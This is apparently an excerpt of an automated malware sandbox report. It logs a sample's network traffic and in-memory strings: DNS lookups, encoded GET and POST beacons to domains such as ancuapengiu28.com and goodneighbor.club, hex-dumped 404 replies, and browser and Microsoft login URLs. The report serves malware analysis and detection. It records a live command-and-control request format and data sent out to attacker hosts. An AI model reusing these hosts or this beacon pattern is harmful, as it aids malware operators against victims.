                Source: global trafficHTTP traffic detected: GET /d3vb/?zn6L=ADPQ8lRoxSByg+mG86XNue8ofAjmBVNA7RwbiYYLDlrQv278ITvGwT6pBJPFcJ5Oe9Xpz76I5qFPHvmWTw5Y21ldoEnhDfgwrYz6sOCTt4XHqos0nmhmqCv1SSwJ5dTjY+t3Vmc=&BF=AP6PLVoH-l HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enHost: www.ancuapengiu28.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Source: global trafficHTTP traffic detected: GET /cf3x/?zn6L=fhkUq/P4ZxLEHzd8F0EWLJcdKz8iuYJByq7cV/MxLbJRpCgBGh5YWRli1K1W4zGjT9DiKSmUVr5x94axFxEXagUQ3v8LbuSXuH3vS/EHZpUYZzgfIELv4uP5zGMq9rw/Og9UkuI=&BF=AP6PLVoH-l HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enHost: www.techacademy.storeConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Source: global trafficHTTP traffic detected: GET /qt04/?zn6L=ZjVlSUsngRwEegGDQi0x16PNmn+zvLQLmgMOdCvpj72y/6TLeiZkhB+jDoYQhv+31XsOucKp5ezTLwqyqsfzW87SAnA9l3fp1K+KRcztaDzuPfUxOD0ClFR9lOpz4Z3tTOcJt7Q=&BF=AP6PLVoH-l HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enHost: www.goodneighbor.clubConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Source: global trafficDNS traffic detected: DNS query: 206.23.85.13.in-addr.arpa
                Source: global trafficDNS traffic detected: DNS query: www.scottifqqy.online
                Source: global trafficDNS traffic detected: DNS query: www.ancuapengiu28.com
                Source: global trafficDNS traffic detected: DNS query: www.techacademy.store
                Source: global trafficDNS traffic detected: DNS query: www.goodneighbor.club
                Source: global trafficDNS traffic detected: DNS query: www.me-sa.online
                Source: unknownHTTP traffic detected: POST /d3vb/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enAccept-Encoding: gzip, deflate, brHost: www.ancuapengiu28.comOrigin: http://www.ancuapengiu28.comReferer: http://www.ancuapengiu28.com/d3vb/Cache-Control: no-cacheContent-Type: application/x-www-form-urlencodedConnection: closeContent-Length: 209User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0Data Raw: 7a 6e 36 4c 3d 4e 42 6e 77 2f 54 5a 31 6c 51 42 50 73 66 61 33 72 70 61 4d 74 49 41 31 59 6e 33 6a 66 33 46 33 71 32 4e 36 2b 6f 59 49 4b 52 62 61 73 30 48 47 57 54 62 46 79 79 66 54 4c 63 44 48 55 4a 74 77 48 65 36 30 72 63 6d 70 6f 39 56 33 4b 75 36 36 58 54 34 6c 39 55 4a 4a 7a 6a 33 6c 54 75 30 57 6e 59 50 78 70 4d 61 4d 7a 35 37 47 68 4e 38 46 76 45 38 52 31 57 37 54 58 78 55 68 67 50 4c 55 51 38 39 53 44 6a 62 41 34 41 42 2f 70 57 77 32 47 46 43 36 52 59 2f 72 74 32 55 7a 7a 6c 4d 44 33 31 35 43 56 42 58 55 6a 35 39 50 73 45 6c 57 77 2f 55 39 6f 59 6f 53 4e 39 53 39 58 4d 56 43 66 6b 4c 6a 55 39 75 50 5a 71 77 66 Data Ascii: zn6L=NBnw/TZ1lQBPsfa3rpaMtIA1Yn3jf3F3q2N6+oYIKRbas0HGWTbFyyfTLcDHUJtwHe60rcmpo9V3Ku66XT4l9UJJzj3lTu0WnYPxpMaMz57GhN8FvE8R1W7TXxUhgPLUQ89SDjbA4AB/pWw2GFC6RY/rt2UzzlMD315CVBXUj59PsElWw/U9oYoSN9S9XMVCfkLjU9uPZqwf
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Wed, 17 Jul 2024 17:00:19 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Wed, 17 Jul 2024 17:00:21 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Wed, 17 Jul 2024 17:00:24 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Wed, 17 Jul 2024 17:00:26 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 17 Jul 2024 17:00:49 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCF-Ray: 8a4bca56190a5e79-EWRCF-Cache-Status: DYNAMICCache-Control: no-cache, must-revalidate, max-age=0Content-Encoding: gzipExpires: Wed, 11 Jan 1984 05:00:00 GMTLink: <https://goodneighbor.club/wp-json/>; rel="https://api.w.org/"Vary: Accept-Encodingki-cache-type: NoneKi-CF-Cache-Status: BYPASSki-edge: v=20.2.7;mv=3.0.6ki-origin: g1pX-Content-Type-Options: nosniffX-Edge-Location-Klb: 1Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bxlNXrqfOuB%2BawULHB9tMokoe6PzNKmsLm2S6B%2BPVr1WB8HB2pQrPV1X2eV6fMyXy1wmKpJjzH8ZEmF6NGa%2FMShZouBlSXZEv3oIXDD%2FR6ivoejc11vdZpSItyxsiyVZpfs7%2BQ14TQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server: cloudflarealt-svc: h3=":443"; ma=86400Data Raw: 33 35 35 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd eb 9a db 38 92 28 f8 db fe be 7d 07 9a e5 4a 49 9d 24 53 52 5e 6c 4b 96 7d 5c 2e 57 b7 67 7c a9 f5 a5 fb f4 38 fd e9 50 22 a5 a4 4d 89 6a 92 ca 74 b6 ac 7d 8d 7d a0 7d b1 8d 0b 00 82 37 5d 32 5d 3d 33 df 39 ae ee 14 09 04 02 81 40 20 10 11 00 81 c7 f7 bc 68 9c 5e 2f 7c e3 22 9d 85 4f ee 3e c6 1f 23 74 e7 d3 81 e9 cf ed 8f ef 4d 4c f3 5d ef c9 dd 3b 8f 67 7e ea 1a e3 0b 37 4e fc 74 60 7e fc f0 9b fd d0 54 e9 73 77 e6 0f cc cb c0 bf 5a 44 71 6a 1a e3 68 9e fa 73 80 bb 0a bc f4 62 e0 f9 97 c1 d8 b7 e9 c5 32 82 79 90 06 6e 68 27 63 37 f4 07 1d c2 12 06 f3 af 46 ec 87 03 73 11 47 93 20 f4 4d e3 22 f6 27 03 f3 22 4d 17 49 ef e8 68 3a 5b 4c 9d 28 9e 1e 7d 9b cc 8f 3a 5c 28 0d d2 d0 7f f2 bb 3b f5 8d 79 94 1a 93 68 39 f7 8c 83 9f 1e 76 3b 9d be f1 e7 28 f2 8c 37 7e 30 bd 18 45 Data Ascii: 35568(}JI$SR^lK}\.Wg|8P"Mjt}}}7]2]=39@ h^/|"O>#tML];g~7Nt`~TswZDqjhsb2ynh'c7FsG M"'"MIh:[L(}:\(;yh9v;(7~0E
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 17 Jul 2024 17:00:52 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCF-Ray: 8a4bca65d82f4289-EWRCF-Cache-Status: DYNAMICCache-Control: no-cache, must-revalidate, max-age=0Content-Encoding: gzipExpires: Wed, 11 Jan 1984 05:00:00 GMTLink: <https://goodneighbor.club/wp-json/>; rel="https://api.w.org/"Vary: Accept-Encodingki-cache-type: NoneKi-CF-Cache-Status: BYPASSki-edge: v=20.2.7;mv=3.0.6ki-origin: g1pX-Content-Type-Options: nosniffX-Edge-Location-Klb: 1Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MFWNvrC5c4AaydgJGcM3xjuVOI%2Bue9WQfJmghbuJ%2BG%2F5wfbCVF%2BoHGMK2ArWaNdAlyUy0XvvJQALxXPEltDNjp47CzB6vBDmMH0%2BVk00G%2F0hYZIoBUr0CuIwF2KCZLUBhIEJBms%2BbA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server: cloudflarealt-svc: h3=":443"; ma=86400Data Raw: 33 35 35 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd eb 9a db 38 92 28 f8 db fe be 7d 07 9a e5 4a 49 9d 24 53 52 5e 6c 4b 96 7d 5c 2e 57 b7 67 7c a9 f5 a5 fb f4 38 fd e9 50 22 a5 a4 4d 89 6a 92 ca 74 b6 ac 7d 8d 7d a0 7d b1 8d 0b 00 82 37 5d 32 5d 3d 33 df 39 ae ee 14 09 04 02 81 40 20 10 11 00 81 c7 f7 bc 68 9c 5e 2f 7c e3 22 9d 85 4f ee 3e c6 1f 23 74 e7 d3 81 e9 cf ed 8f ef 4d 4c f3 5d ef c9 dd 3b 8f 67 7e ea 1a e3 0b 37 4e fc 74 60 7e fc f0 9b fd d0 54 e9 73 77 e6 0f cc cb c0 bf 5a 44 71 6a 1a e3 68 9e fa 73 80 bb 0a bc f4 62 e0 f9 97 c1 d8 b7 e9 c5 32 82 79 90 06 6e 68 27 63 37 f4 07 1d c2 12 06 f3 af 46 ec 87 03 73 11 47 93 20 f4 4d e3 22 f6 27 03 f3 22 4d 17 49 ef e8 68 3a 5b 4c 9d 28 9e 1e 7d 9b cc 8f 3a 5c 28 0d d2 d0 7f f2 bb 3b f5 8d 79 94 1a 93 68 39 f7 8c 83 9f 1e 76 3b 9d be f1 e7 28 f2 8c 37 7e Data Ascii: 35568(}JI$SR^lK}\.Wg|8P"Mjt}}}7]2]=39@ h^/|"O>#tML];g~7Nt`~TswZDqjhsb2ynh'c7FsG M"'"MIh:[L(}:\(;yh9v;(7~
                Source: nK1Y86mbzfbkwpB.exe, GDhinOc.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                Source: nK1Y86mbzfbkwpB.exe, GDhinOc.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                Source: runas.exe, 00000011.00000002.3358247281.000000000539A000.00000004.10000000.00040000.00000000.sdmp, hAtMBptzWt.exe, 00000016.00000002.3357539718.000000000322A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://goodneighbor.club/qt04/?zn6L=ZjVlSUsngRwEegGDQi0x16PNmn
                Source: nK1Y86mbzfbkwpB.exe, GDhinOc.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
                Source: nK1Y86mbzfbkwpB.exe, 00000000.00000002.2180682154.00000000027F6000.00000004.00000800.00020000.00000000.sdmp, GDhinOc.exe, 00000008.00000002.2407319175.0000000002B47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: hAtMBptzWt.exe, 00000016.00000002.3353699793.000000000088D000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.goodneighbor.club
                Source: hAtMBptzWt.exe, 00000016.00000002.3353699793.000000000088D000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.goodneighbor.club/qt04/
                Source: runas.exe, 00000011.00000003.2822900038.000000000784E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: runas.exe, 00000011.00000003.2822900038.000000000784E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: runas.exe, 00000011.00000003.2822900038.000000000784E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: runas.exe, 00000011.00000003.2822900038.000000000784E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: runas.exe, 00000011.00000003.2822900038.000000000784E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: runas.exe, 00000011.00000003.2822900038.000000000784E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: runas.exe, 00000011.00000003.2822900038.000000000784E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: runas.exe, 00000011.00000002.3352619446.0000000002821000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
